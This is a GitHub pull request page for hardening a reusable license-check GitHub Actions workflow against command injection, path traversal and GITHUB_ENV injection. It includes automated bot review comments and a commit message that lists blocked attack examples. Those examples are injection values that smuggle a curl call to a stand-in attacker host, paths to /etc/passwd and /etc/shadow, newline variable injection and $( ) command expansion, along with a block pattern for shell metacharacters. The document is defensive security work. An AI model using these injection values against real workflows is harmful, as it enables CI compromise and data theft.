Sanitize github action inputs and fix vulnerabilities #45
Conversation
|
Cursor Agent can help with this pull request. Just |
![cursor[bot]](https://avatars.githubusercontent.com/in/1210556?s=60&v=4){kind=small}
There was a problem hiding this comment.
This PR is being reviewed by Cursor Bugbot
Details
Your team is on the Bugbot Free tier. On this plan, Bugbot will review limited PRs each billing cycle for each member of your team.
To receive Bugbot reviews on all of your PRs, visit the Cursor dashboard to activate Pro and start your 14-day free trial.
|
|
||
| # Set sanitized environment variables | ||
| echo "SANITIZED_PATH=${{ inputs.path }}" >> $GITHUB_ENV | ||
| echo "SANITIZED_LICENSE_ALLOW_LIST=${{ inputs.license_allow_list }}" >> $GITHUB_ENV |
There was a problem hiding this comment.
Bug: Newline Injection: Compromising GITHUB_ENV Security
The validation regex doesn't check for newline characters (\n or \r), allowing GITHUB_ENV injection attacks. An attacker can provide input containing newlines to inject arbitrary environment variables when the values are written to $GITHUB_ENV in lines 58-59, bypassing the intended security controls and potentially executing malicious code in subsequent workflow steps.
| # Validate license_allow_list input | ||
| if [[ "${{ inputs.license_allow_list }}" =~ \.\./|\;|\||\&|\$\(|\`|\<|\>|[ ]{2,} ]]; then | ||
| echo "Error: Invalid characters detected in license_allow_list input" | ||
| exit 1 |
There was a problem hiding this comment.
Bug: Absolute Paths Bypass Workspace Security
The validation regex doesn't reject absolute paths (starting with /), allowing attackers to specify paths outside the intended workspace. The documentation states paths should be "relative to west workspace," but inputs like /etc/passwd would pass validation and be used in checkout paths and directory operations, potentially accessing or modifying unintended filesystem locations.
thst-nordic
force-pushed
the
cursor/sanitize-github-action-inputs-and-fix-vulnerabilities-4efe
branch
from
1575aae to
4c8143e
Compare
…cense-reusable workflow
This commit addresses critical security vulnerabilities in the license-reusable.yml
GitHub Actions workflow that could allow multiple attack vectors through unsanitized
user inputs.
Security Issues Fixed:
1. Command Injection - Direct interpolation of ${{ inputs.path }} in shell commands
2. Path Traversal - Unsanitized relative path inputs (../) accessing unintended files
3. Absolute Path Access - Paths starting with / bypassing workspace restrictions
4. GITHUB_ENV Injection - Newline characters allowing environment variable injection
5. Shell Metacharacter Injection - Various shell operators enabling code execution
Key Security Changes:
✅ Comprehensive input validation with regex blocking dangerous patterns
✅ Absolute path rejection enforcing relative-only workspace paths
✅ Newline character detection preventing GITHUB_ENV injection attacks
✅ Sanitized environment variables replacing direct input interpolation
✅ Proper shell quoting around all variable references
✅ Explicit permissions section following principle of least privilege
✅ Updated actions/cache to v4 for latest security patches
Attack Examples Blocked:
- Command injection: path="; curl http://attacker.com/steal; #"
- Path traversal: path="../../../etc/passwd"
- Absolute paths: path="/etc/shadow"
- GITHUB_ENV injection: path="module\nMALICIOUS_VAR=evil_payload"
- Shell expansion: license_allow_list="$(malicious_command)"
Validation Patterns:
- Blocks: ../, ;, |, &, $(), backticks, <, >, \n, \r, ^/, multiple spaces
- Enforces: Relative paths only, no shell metacharacters, no newlines
- Applies to: Both 'path' and 'license_allow_list' inputs
The workflow now safely validates and sanitizes all user-controlled inputs,
eliminating injection vulnerabilities and preventing CI/CD environment compromise.
cursor
bot
force-pushed
the
cursor/sanitize-github-action-inputs-and-fix-vulnerabilities-4efe
branch
from
a8a1590 to
d8ae154
Compare
Sanitize inputs in
license-reusable.ymlto fix GitHub Actions command injection and path traversal vulnerabilities.The original workflow directly interpolated user-provided inputs into shell commands and file paths, allowing for potential command injection and path traversal. This PR introduces input validation, uses sanitized environment variables, and ensures proper shell quoting to prevent these attacks.
Note
Sanitizes and safely uses inputs in the reusable license workflow, hardening it against command injection and path traversal while adjusting paths/working directory accordingly.
.github/workflows/license-reusable.yml:inputs.pathandinputs.license_allow_listto block traversal/injection; exportSANITIZED_PATHandSANITIZED_LICENSE_ALLOW_LIST.MODULE_PATH,LICENSE_ALLOW_LIST) across checkout, debug logs, license check, and artifact upload.working-directory: ncsandcd "${MODULE_PATH}"before runningcheck_license.py; ensure all paths/args are quoted.licenses.xmlfromncs/${{ env.MODULE_PATH }}/licenses.xmlusing sanitized path.Written by Cursor Bugbot for commit 4c8143eb09564782bda333d1fd0f177f42718211. This will update automatically on new commits. Configure here.